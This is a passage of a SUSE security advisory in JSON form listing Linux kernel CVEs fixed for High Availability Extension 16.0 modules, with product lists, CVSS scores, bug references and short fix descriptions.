"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-38541",
"url": "https://www.suse.com/security/cve/CVE-2025-38541"
},
{
"category": "external",
"summary": "SUSE Bug 1248216 for CVE-2025-38541",
"url": "https://bugzilla.suse.com/1248216"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:32:45Z",
"details": "moderate"
}
],
"title": "CVE-2025-38541"
},
{
"cve": "CVE-2025-38543",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-38543"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/tegra: nvdec: Fix dma_alloc_coherent error check\n\nCheck for NULL return value with dma_alloc_coherent, in line with\nRobin\u0027s fix for vic.c in \u0027drm/tegra: vic: Fix DMA API misuse\u0027.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-38543",
"url": "https://www.suse.com/security/cve/CVE-2025-38543"
},
{
"category": "external",
"summary": "SUSE Bug 1248214 for CVE-2025-38543",
"url": "https://bugzilla.suse.com/1248214"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:32:45Z",
"details": "moderate"
}
],
"title": "CVE-2025-38543"
},
{
"cve": "CVE-2025-38547",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-38547"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\niio: adc: axp20x_adc: Add missing sentinel to AXP717 ADC channel maps\n\nThe AXP717 ADC channel maps is missing a sentinel entry at the end. This\ncauses a KASAN warning.\n\nAdd the missing sentinel entry.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-38547",
"url": "https://www.suse.com/security/cve/CVE-2025-38547"
},
{
"category": "external",
"summary": "SUSE Bug 1248222 for CVE-2025-38547",
"url": "https://bugzilla.suse.com/1248222"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 3.3,
"baseSeverity": "LOW",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:32:45Z",
"details": "low"
}
],
"title": "CVE-2025-38547"
},
{
"cve": "CVE-2025-38548",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-38548"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nhwmon: (corsair-cpro) Validate the size of the received input buffer\n\nAdd buffer_recv_size to store the size of the received bytes.\nValidate buffer_recv_size in send_usb_cmd().",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-38548",
"url": "https://www.suse.com/security/cve/CVE-2025-38548"
},
{
"category": "external",
"summary": "SUSE Bug 1248228 for CVE-2025-38548",
"url": "https://bugzilla.suse.com/1248228"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:32:45Z",
"details": "moderate"
}
],
"title": "CVE-2025-38548"
},
{
"cve": "CVE-2025-38550",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-38550"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nipv6: mcast: Delay put pmc-\u003eidev in mld_del_delrec()\n\npmc-\u003eidev is still used in ip6_mc_clear_src(), so as mld_clear_delrec()\ndoes, the reference should be put after ip6_mc_clear_src() return.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-38550",
"url": "https://www.suse.com/security/cve/CVE-2025-38550"
},
{
"category": "external",
"summary": "SUSE Bug 1248227 for CVE-2025-38550",
"url": "https://bugzilla.suse.com/1248227"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:32:45Z",
"details": "moderate"
}
],
"title": "CVE-2025-38550"
},
{
"cve": "CVE-2025-38551",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-38551"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nvirtio-net: fix recursived rtnl_lock() during probe()\n\nThe deadlock appears in a stack trace like:\n\n virtnet_probe()\n rtnl_lock()\n virtio_config_changed_work()\n netdev_notify_peers()\n rtnl_lock()\n\nIt happens if the VMM sends a VIRTIO_NET_S_ANNOUNCE request while the\nvirtio-net driver is still probing.\n\nThe config_work in probe() will get scheduled until virtnet_open() enables\nthe config change notification via virtio_config_driver_enable().",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-38551",
"url": "https://www.suse.com/security/cve/CVE-2025-38551"
},
{
"category": "external",
"summary": "SUSE Bug 1248234 for CVE-2025-38551",
"url": "https://bugzilla.suse.com/1248234"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:32:45Z",
"details": "moderate"
}
],
"title": "CVE-2025-38551"
},
{
"cve": "CVE-2025-38569",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-38569"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nbenet: fix BUG when creating VFs\n\nbenet crashes as soon as SRIOV VFs are created:\n\n kernel BUG at mm/vmalloc.c:3457!\n Oops: invalid opcode: 0000 [#1] SMP KASAN NOPTI\n CPU: 4 UID: 0 PID: 7408 Comm: test.sh Kdump: loaded Not tainted 6.16.0+ #1 PREEMPT(voluntary)\n [...]\n RIP: 0010:vunmap+0x5f/0x70\n [...]\n Call Trace:\n \u003cTASK\u003e\n __iommu_dma_free+0xe8/0x1c0\n be_cmd_set_mac_list+0x3fe/0x640 [be2net]\n be_cmd_set_mac+0xaf/0x110 [be2net]\n be_vf_eth_addr_config+0x19f/0x330 [be2net]\n be_vf_setup+0x4f7/0x990 [be2net]\n be_pci_sriov_configure+0x3a1/0x470 [be2net]\n sriov_numvfs_store+0x20b/0x380\n kernfs_fop_write_iter+0x354/0x530\n vfs_write+0x9b9/0xf60\n ksys_write+0xf3/0x1d0\n do_syscall_64+0x8c/0x3d0\n\nbe_cmd_set_mac_list() calls dma_free_coherent() under a spin_lock_bh.\nFix it by freeing only after the lock has been released.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-38569",
"url": "https://www.suse.com/security/cve/CVE-2025-38569"
},
{
"category": "external",
"summary": "SUSE Bug 1248384 for CVE-2025-38569",
"url": "https://bugzilla.suse.com/1248384"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:32:45Z",
"details": "moderate"
}
],
"title": "CVE-2025-38569"
},
{
"cve": "CVE-2025-38589",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-38589"
}
],
"notes": [
{
"category": "general",
